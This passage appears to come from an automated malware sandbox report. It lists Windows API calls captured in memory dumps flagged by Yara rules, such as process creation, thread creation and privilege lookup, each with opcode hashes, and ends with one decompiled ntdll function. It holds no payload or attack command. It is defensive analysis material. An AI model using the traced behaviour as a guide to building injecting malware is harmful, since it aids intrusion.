                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 01048594
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction ID: 211728466ba9896446ec396b40d592cf1575194671126ddb15b66d6f8cd430cd
                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction Fuzzy Hash: ED01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA4D97240C630E851CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 01048594
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: fbe69861443396d500455a8c8e243eb0a366446f9d121da726b7e4b470b4c3f5
                                                                                    • Instruction ID: 1f7f494725a843e08ca18b37b479527b5a468769b4dda022ee5d75c548fa38cb
                                                                                    • Opcode Fuzzy Hash: fbe69861443396d500455a8c8e243eb0a366446f9d121da726b7e4b470b4c3f5
                                                                                    • Instruction Fuzzy Hash: B901B2B2200108BFCB54DF99DC80EEB77ADAF8C354F158258FA5DA7291C630E851CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0103CCD0,?,?), ref: 0104704C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
                                                                                    • Instruction ID: 0b72c4fb3a37eec4a359cc7ec1fce68d9578cc7d1d6d95ee1daabb762b2c6800
                                                                                    • Opcode Fuzzy Hash: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
                                                                                    • Instruction Fuzzy Hash: 0AE06D733912143BE23065999C42FE7B39C9B91B20F540036FB4DEB2C0D595F80142A8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0103CCD0,?,?), ref: 0104704C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 57b41df7b6ded3c6ef72d6e8d63e713bb1bbfc4eae607ec5bd018a182b9a9725
                                                                                    • Instruction ID: 3490b759c53dbd2e967e38e4038c1754cc6ef160a116f6aa7e15e652e26d5d7a
                                                                                    • Opcode Fuzzy Hash: 57b41df7b6ded3c6ef72d6e8d63e713bb1bbfc4eae607ec5bd018a182b9a9725
                                                                                    • Instruction Fuzzy Hash: 25F02B733413007BE231A56C9C42FE3779C8F91B10F550179FB49BF2C0C5A9B84146A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(01043516,?,01043C8F,01043C8F,?,01043516,?,?,?,?,?,00000000,00000000,?), ref: 010484BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                    • Instruction ID: 1c9ae45d51b7d98dffaf604c1645083a8f98caaab88c41845bdd96b7b9643010
                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                    • Instruction Fuzzy Hash: 6FE046B1200208ABDB14EF99CC80EE777ACEF88650F118959FE485B241CA30F910CBF0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0103CFA2,0103CFA2,?,00000000,?,?), ref: 01048660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                    • Instruction ID: 5c55d8247ac477d179c1134d17b28f8f1cab95edfec5e990b41576d241cb94f5
                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                    • Instruction Fuzzy Hash: 2CE01AB12002086BDB10EF89CC84EE737ADAF88650F018565FA4857241C930E8108BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,01037C63,?), ref: 0103D43B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Offset: 01030000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                    • Instruction ID: 510c157c96910100c11135bf3032085d7e08c0ee4a8abb423eccb72cdaa36716
                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                    • Instruction Fuzzy Hash: 7DD05E657503043BE610AAA89C02F6632CC6B54A00F894064FA899B2C3D950E4004561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e6eea77fc4f53da11b80000522f36c923002ef22dd9b991a2ee839f3435fbaf0
                                                                                    • Instruction ID: 254c02f8ada6b59e50a7f491ae0a1e3dd83409074f761687c2fad9712d20732c
                                                                                    • Opcode Fuzzy Hash: e6eea77fc4f53da11b80000522f36c923002ef22dd9b991a2ee839f3435fbaf0
                                                                                    • Instruction Fuzzy Hash: DBB09B719424C9C6D611D7E046087177904B7D0741F17C0D5E6024791A4778C4D5F5B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    C-Code - Quality: 53%
                                                                                    			E0389FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                    				void* _t7;
                                                                                    				intOrPtr _t9;
                                                                                    				intOrPtr _t10;
                                                                                    				intOrPtr* _t12;
                                                                                    				intOrPtr* _t13;
                                                                                    				intOrPtr _t14;
                                                                                    				intOrPtr* _t15;
                                                                                    
                                                                                    				_t13 = __edx;
                                                                                    				_push(_a4);
                                                                                    				_t14 =  *[fs:0x18];
                                                                                    				_t15 = _t12;
                                                                                    				_t7 = E0384CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                    				_push(_t13);
                                                                                    				E03895720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                    				_t9 =  *_t15;
                                                                                    				if(_t9 == 0xffffffff) {
                                                                                    					_t10 = 0;
                                                                                    				} else {
                                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                    				}
                                                                                    				_push(_t10);
                                                                                    				_push(_t15);
                                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                    				return E03895720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                    			}











                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0389FDFA
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0389FE01
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0389FE2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp, Offset: 037E0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.907825773.00000000038FB000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.907833227.00000000038FF000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                    • API String ID: 885266447-3903918235
                                                                                    • Opcode ID: e0378ddd1dac3c51284c59ab16a57a8f460b3e494b14f2787e5596ba5ba352e1
                                                                                    • Instruction ID: 47f7b69a25ba76d1ed35de4015bb44239cf29d75e6b0b4803dc256ce8393d1df
                                                                                    • Opcode Fuzzy Hash: e0378ddd1dac3c51284c59ab16a57a8f460b3e494b14f2787e5596ba5ba352e1
                                                                                    • Instruction Fuzzy Hash: 9EF0FC762402017FEE259A85DC05F27BB5AEB45730F180355F724D95D1EA62F920C7F1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%